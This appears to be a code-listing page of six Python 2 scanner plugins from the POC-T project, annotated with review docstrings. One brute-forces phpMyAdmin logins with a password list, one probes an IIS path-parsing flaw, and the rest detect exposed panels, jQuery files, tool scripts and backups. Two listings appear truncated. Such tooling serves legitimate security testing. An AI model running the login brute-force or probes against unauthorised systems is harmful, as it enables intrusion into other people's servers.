コード例 #1
ファイル: phpmyadmin.py プロジェクト: baishuole/POC-T
def poc(url):
    """Locate phpMyAdmin under *url*, then submit a password list to its login form.

    Phase 1 requests ``testurl + d`` for every entry of PHPMYADMIN_DICT and
    keeps each URL that answers 200 with PHPMYADMIN_KEYWORD in the body.
    Phase 2 POSTs ``pma_username`` / ``pma_password`` to ``<path>/index.php``
    once per entry of PHPMYADMIN_PASSWORD_DICT and records a line in
    PWD_OK_RESULT when the reply is 200 and contains PHPMYADMIN_LOGIN_OK_KWD.

    Returns None when siteIndexTest() rejects the target.

    NOTE(review): the listing stops inside the last ``except`` handler, so
    PWD_OK_RESULT is filled but never returned in the visible lines; the rest
    of the function was probably cut off by the page -- confirm against the
    project source.

    NOTE(review): this is Python 2 code (``except Exception,e`` and
    ``print e`` below do not parse on Python 3).

    Server-side view: one client sends a run of GETs for panel paths and then
    repeated POSTs to ``index.php`` carrying ``pma_username`` and
    ``pma_password``.  Both match-checks are keyword heuristics on the body,
    so a hit is an indication, not proof.
    """
    testurl = urlhandler(url)
    if not siteIndexTest(testurl):
        return  # '[SiteRequestErr-phpMyAdmin] %s' % testurl

    # URLs where a phpMyAdmin page was recognised.
    pmd_path_result = []

    for d in PHPMYADMIN_DICT:
        payload = testurl + d
        try:
            # NOTE(review): VERIFY is defined elsewhere; if it is False, TLS
            # certificate validation is disabled for this request -- confirm.
            r = requests.get(payload, headers=HEADERS, timeout=TIMEOUT,
                             verify=VERIFY)
            if r.status_code == 200 and PHPMYADMIN_KEYWORD in r.content:
                #pmd_path_result.append('[phpMyAdmin]-%s' % payload)
                pmd_path_result.append(payload)
        except Exception:
            # Every failure (timeout, DNS, TLS, type error) is dropped
            # silently, so an unreachable path looks the same as a miss.
            pass

    PWD_OK_RESULT = []

    if pmd_path_result:
        for pmd_path in pmd_path_result:
            for password in PHPMYADMIN_PASSWORD_DICT:
                # NOTE(review): the username literal is masked as shown on
                # this page, while the report string below hard-codes 'root';
                # the reported account name is not taken from the value sent.
                poc_data = {'pma_username': '******', 'pma_password': password}
                try:
                    # One request per (path, password) pair, with no delay or
                    # stop-on-success visible here.  Login throttling and
                    # keeping the panel off untrusted networks are the usual
                    # controls against this request pattern.
                    r = requests.post(pmd_path+'/index.php', data=poc_data, headers=HEADERS,
                                      timeout=TIMEOUT, verify=VERIFY)
                    if r.status_code == 200 and PHPMYADMIN_LOGIN_OK_KWD in r.content:
                        PWD_OK_RESULT.append('[phpMyAdmin_PWD] '+pmd_path+'|root|'+password)
                except Exception,e:
                    # Unlike phase 1, errors here are printed rather than dropped.
                    print e
コード例 #2
ファイル: iisparse.py プロジェクト: wang0098/POC-T
def poc(url):
    """Check whether *url* serves ``robots.txt/.php`` with IISPARSE_KEYWORD in the body.

    The probe appends ``robots.txt/.php`` to the normalised base URL and looks
    for IISPARSE_KEYWORD in the response.  The HTTP status code is not
    inspected, only the body.

    Returns:
        ``'[iis7.5_parse] <probe url>'`` when the keyword is present,
        ``False`` when it is absent or the request raises,
        ``None`` when siteIndexTest() rejects the target.

    NOTE(review): presumably this targets the path-info handling issue where a
    static file is passed to the PHP handler once ``/.php`` is appended; the
    usual server-side fix is ``cgi.fix_pathinfo=0`` or a handler mapping that
    only fires for files that exist -- confirm against the project's notes.
    """
    base = urlhandler(url)
    if not siteIndexTest(base):
        return  # '[SiteRequestErr-iisparse] %s' % testurl

    payload = base + "robots.txt/.php"
    try:
        # NOTE(review): VERIFY is defined elsewhere; if it is False, TLS
        # certificate validation is disabled for this request -- confirm.
        response = requests.get(payload, headers=HEADERS, timeout=TIMEOUT, verify=VERIFY)
        matched = IISPARSE_KEYWORD in response.content
    except Exception:
        # Any request or comparison error is reported as "no finding".
        return False

    if matched:
        return '[iis7.5_parse] %s' % payload
    return False
コード例 #3
def poc(url):
    """Look for jQuery files under *url* using the JQUERY_DICT path list.

    Each entry is stripped of surrounding whitespace, appended to the
    normalised base URL and requested; a 200 response whose body contains
    JQUERY_KEYWORD is recorded as ``"[jQuery] <url>"``.

    Returns None when siteIndexTest() rejects the target.

    NOTE(review): the listing ends right after the loop, so ``result`` is
    filled but never returned in the visible lines and the function returns
    None as shown.  The tail was probably cut off by the page -- confirm
    against the project source.
    """
    base = urlhandler(url)
    if not siteIndexTest(base):
        return  # '[SiteRequestErr-Jquery] %s' % testurl

    result = []

    for entry in JQUERY_DICT:
        try:
            payload = base + entry.strip()
            resp = requests.get(payload, headers=HEADERS, timeout=TIMEOUT, verify=VERIFY)
            found = resp.status_code == 200 and JQUERY_KEYWORD in resp.content
            if found:
                result.append("[jQuery] " + payload)
        except Exception:
            # Errors (including a failing strip() or request) are dropped
            # silently; an unreachable path is indistinguishable from a miss.
            pass
コード例 #4
def poc(url):
    """Report which PHPMYADMIN_DICT paths under *url* serve a phpMyAdmin page.

    A path counts as a finding when the GET returns 200 and the body contains
    PHPMYADMIN_KEYWORD.  This is detection only; no login is attempted.

    Returns:
        A list of ``'[phpMyAdmin] <url>'`` strings when at least one path
        matched, otherwise ``None`` (also ``None`` when siteIndexTest()
        rejects the target).

    An exposed panel found this way is normally handled by restricting it to
    trusted networks or removing it from the web root.
    """
    base = urlhandler(url)
    if not siteIndexTest(base):
        return  # '[SiteRequestErr-phpMyAdmin] %s' % testurl

    def _probe(candidate):
        # Returns the report line for a match, None otherwise.  Any error is
        # treated as "no match", so failures are silent.
        try:
            # NOTE(review): VERIFY is defined elsewhere; if it is False, TLS
            # certificate validation is disabled for this request -- confirm.
            resp = requests.get(candidate, headers=HEADERS, timeout=TIMEOUT, verify=VERIFY)
            if resp.status_code == 200 and PHPMYADMIN_KEYWORD in resp.content:
                return '[phpMyAdmin] %s' % candidate
        except Exception:
            pass
        return None

    outcomes = [_probe(base + suffix) for suffix in PHPMYADMIN_DICT]
    hits = [line for line in outcomes if line is not None]
    return hits or None
コード例 #5
def poc(url):
    """Report which DZ_TOOLS_DICT paths under *url* match DZ_TOOLS_KEYWORD.

    Every entry is appended to the normalised base URL and fetched; a 200
    response whose body contains DZ_TOOLS_KEYWORD is recorded.

    Returns:
        A list of ``'[dz_tools] <url>'`` strings when at least one path
        matched, otherwise ``None`` (also ``None`` when siteIndexTest()
        rejects the target).

    NOTE(review): presumably these are leftover maintenance scripts that
    should not remain in a production web root -- confirm against the
    dictionary contents.
    """
    base = urlhandler(url)
    if not siteIndexTest(base):
        return  # '[SiteRequestErr-Dz_tools] %s' % testurl

    findings = []

    for suffix in DZ_TOOLS_DICT:
        target = base + suffix
        try:
            resp = requests.get(target, headers=HEADERS, timeout=TIMEOUT, verify=VERIFY)
            if resp.status_code != 200:
                continue
            if DZ_TOOLS_KEYWORD not in resp.content:
                continue
            findings.append('[dz_tools] %s' % target)
        except Exception:
            # Request and comparison errors are dropped silently.
            continue

    return findings if findings else None
コード例 #6
ファイル: bakfile.py プロジェクト: wang0098/POC-T
def poc(url):
    """Normalise *url*, confirm the site responds, then hand it to audit().

    Returns whatever audit() returns for the normalised URL, or ``None`` when
    siteIndexTest() rejects the target.  audit() is defined elsewhere in the
    file and is not visible in this listing.
    """
    target = urlhandler(url)
    if siteIndexTest(target):
        return audit(target)
    return None  # '[SiteRequestErr-bakfile] %s' % testurl